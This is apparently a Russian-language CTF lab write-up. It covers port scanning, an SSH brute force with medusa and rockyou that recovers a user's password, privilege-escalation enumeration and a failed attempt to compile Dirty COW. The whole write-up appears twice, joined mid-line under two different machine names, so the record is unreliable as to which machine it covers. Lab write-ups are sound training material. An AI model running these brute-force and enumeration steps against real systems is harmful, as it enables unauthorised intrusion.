# Машина: library / Ubuntu 16.04 (10.112.179.19) / ядро 4.4.0-159

# ============================================================
# 1. ПОДГОТОВКА: Анализ и поиск вектора
# ============================================================

0. ping 10.112.179.19 → хост доступен

1. nmap -sC -sV 10.112.179.19
   → открыто: 22/tcp (SSH), 80/tcp (HTTP)

2. dirsearch -u http://10.112.179.19
   → /robots.txt (User-agent: rockyou), /images/

3. curl http://10.112.179.19
   → статический блог, в комментариях имена: root, www-data, Anonymous, meliodas (автор)

4. nmap -p- --min-rate 1000 10.112.179.19
   → найден дополнительный порт 8765/tcp (админ-панель с формой логина)

5. curl http://10.112.179.19:8765/
   → форма входа: /auth/login.php

6. брут SSH с логином meliodas + словарь rockyou (medusa)
   medusa -h 10.112.179.19 -u meliodas -P /usr/share/wordlists/rockyou.txt -M ssh -t 6 -f
   → пароль найден: iloveyou1

7. ssh meliodas@10.112.179.19
   → доступ получен


# ============================================================
# 2. ПОВЫШЕНИЕ ПРИВИЛЕГИЙ
# ============================================================

# 2.1 Первичная разведка
whoami        # meliodas
id            # uid=1000(meliodas), groups=1000(meliodas),4(adm),...
sudo -l       # (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
uname -a      # 4.4.0-159-generic x86_64

# 2.2 Проверка векторов
find / -perm -4000 -type f 2>/dev/null          # стандартный SUID, нет необычного
cat /etc/crontab                                 # системные cron-задачи
ls -la /home/meliodas/bak.py                     # файл существует, но не редактируется

# 2.3 Поиск user.txt
find /home -name "user.txt" 2>/dev/null
cat /home/meliodas/user.txt
✅ user.txt получен

# 2.4 Запуск LinPEAS
./linpeas.sh
# ключевые находки:
# - ядро 4.4.0-159 уязвимо для CVE-2016-5195 (Dirty COW)
# - также найдены CVE-2017-1000112, CVE-2018-18955

# 2.5 Проблема: на цели нет gcc
which gcc     # gcc не установлен

# 2.6 Попытки скомпилировать Dirty COW на Kali (ARM) для цели (x86_64)
# - кросс-компиляция: ошибка bits/wordsize.h
# - Docker: скомпилирован бинарник под ARM, а нужно x86_64
# - Docker + QEMU: образ amd64/ubuntu не найден для arm64/v8

# 2.7 Вывод: вектор найден (Dirty COW), но не применён из-за архитектуры атакующей машины


# ============================================================
# 3. ФЛАГИ
# ============================================================
# user.txt: ✅ получен (/home/meliodas/user.txt)
# root.txt: ❌ не получен (требуется privesc)


# ============================================================
# 4. ПРОБЛЕМЫ И ВЫВОДЫ
# ============================================================
# - целевая машина: x86_64
# - атакующая машина: ARM64 (Kali на ARM)
# - кросс-компиляция под x86_64 на ARM требует полного набора заголовков
# - Docker на ARM по умолчанию компилирует под ARM
# - для обхода: использовать x86_64 среду (VM) или онлайн-компилятор


# ============================================================
# 5. ИТОГ
# ============================================================
# ✅ разведка выполнена
# ✅ доступ получен (meliodas:iloveyou1)
# ✅ user.txt найден
# ✅ вектор privesc найден (Dirty COW)
# ❌ privesc до root не завершён (архитектурное ограничение)# Машина: Mustacchio / Ubuntu 16.04 (10.112.179.19) / ядро 4.4.0-159

# ============================================================
# 1. ПОДГОТОВКА: Анализ и поиск вектора
# ============================================================

0. ping 10.112.179.19 → хост доступен

1. nmap -sC -sV 10.112.179.19
   → открыто: 22/tcp (SSH), 80/tcp (HTTP)

2. dirsearch -u http://10.112.179.19
   → /robots.txt (User-agent: rockyou), /images/

3. curl http://10.112.179.19
   → статический блог, в комментариях имена: root, www-data, Anonymous, meliodas (автор)

4. nmap -p- --min-rate 1000 10.112.179.19
   → найден дополнительный порт 8765/tcp (админ-панель с формой логина)

5. curl http://10.112.179.19:8765/
   → форма входа: /auth/login.php

6. брут SSH с логином meliodas + словарь rockyou (medusa)
   medusa -h 10.112.179.19 -u meliodas -P /usr/share/wordlists/rockyou.txt -M ssh -t 6 -f
   → пароль найден: iloveyou1

7. ssh meliodas@10.112.179.19
   → доступ получен


# ============================================================
# 2. ПОВЫШЕНИЕ ПРИВИЛЕГИЙ
# ============================================================

# 2.1 Первичная разведка
whoami        # meliodas
id            # uid=1000(meliodas), groups=1000(meliodas),4(adm),...
sudo -l       # (ALL) NOPASSWD: /usr/bin/python* /home/meliodas/bak.py
uname -a      # 4.4.0-159-generic x86_64

# 2.2 Проверка векторов
find / -perm -4000 -type f 2>/dev/null          # стандартный SUID, нет необычного
cat /etc/crontab                                 # системные cron-задачи
ls -la /home/meliodas/bak.py                     # файл существует, но не редактируется

# 2.3 Поиск user.txt
find /home -name "user.txt" 2>/dev/null
cat /home/meliodas/user.txt
✅ user.txt получен

# 2.4 Запуск LinPEAS
./linpeas.sh
# ключевые находки:
# - ядро 4.4.0-159 уязвимо для CVE-2016-5195 (Dirty COW)
# - также найдены CVE-2017-1000112, CVE-2018-18955

# 2.5 Проблема: на цели нет gcc
which gcc     # gcc не установлен

# 2.6 Попытки скомпилировать Dirty COW на Kali (ARM) для цели (x86_64)
# - кросс-компиляция: ошибка bits/wordsize.h
# - Docker: скомпилирован бинарник под ARM, а нужно x86_64
# - Docker + QEMU: образ amd64/ubuntu не найден для arm64/v8

# 2.7 Вывод: вектор найден (Dirty COW), но не применён из-за архитектуры атакующей машины


# ============================================================
# 3. ФЛАГИ
# ============================================================
# user.txt: ✅ получен (/home/meliodas/user.txt)
# root.txt: ❌ не получен (требуется privesc)


# ============================================================
# 4. ПРОБЛЕМЫ И ВЫВОДЫ
# ============================================================
# - целевая машина: x86_64
# - атакующая машина: ARM64 (Kali на ARM)
# - кросс-компиляция под x86_64 на ARM требует полного набора заголовков
# - Docker на ARM по умолчанию компилирует под ARM
# - для обхода: использовать x86_64 среду (VM) или онлайн-компилятор


# ============================================================
# 5. ИТОГ
# ============================================================
# ✅ разведка выполнена
# ✅ доступ получен (meliodas:iloveyou1)
# ✅ user.txt найден
# ✅ вектор privesc найден (Dirty COW)
# ❌ privesc до root не завершён (архитектурное ограничение)
